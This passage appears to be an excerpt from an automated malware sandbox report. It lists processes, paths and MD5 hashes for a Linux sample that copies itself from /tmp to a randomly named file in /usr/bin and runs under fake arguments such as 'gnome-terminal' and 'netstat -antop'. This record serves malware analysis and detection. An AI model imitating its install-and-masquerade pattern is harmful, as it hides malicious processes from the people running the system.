                                                                                Start time:00:26:22
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:26:22
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:26:22
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/getzgxvgyl
                                                                                Arguments:/usr/bin/getzgxvgyl gnome-terminal 4554
                                                                                File size:625922 bytes
                                                                                MD5 hash:bc5ec5fe87f5d79b8c779995fd03ec4a

                                                                                General

                                                                                Start time:00:26:22
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/getzgxvgyl
                                                                                Arguments:n/a
                                                                                File size:625922 bytes
                                                                                MD5 hash:bc5ec5fe87f5d79b8c779995fd03ec4a

                                                                                General

                                                                                Start time:00:26:22
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:26:22
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:26:22
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/getzgxvgyl
                                                                                Arguments:/usr/bin/getzgxvgyl "netstat -antop" 4554
                                                                                File size:625922 bytes
                                                                                MD5 hash:bc5ec5fe87f5d79b8c779995fd03ec4a

                                                                                General

                                                                                Start time:00:26:22
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/getzgxvgyl
                                                                                Arguments:n/a
                                                                                File size:625922 bytes
                                                                                MD5 hash:bc5ec5fe87f5d79b8c779995fd03ec4a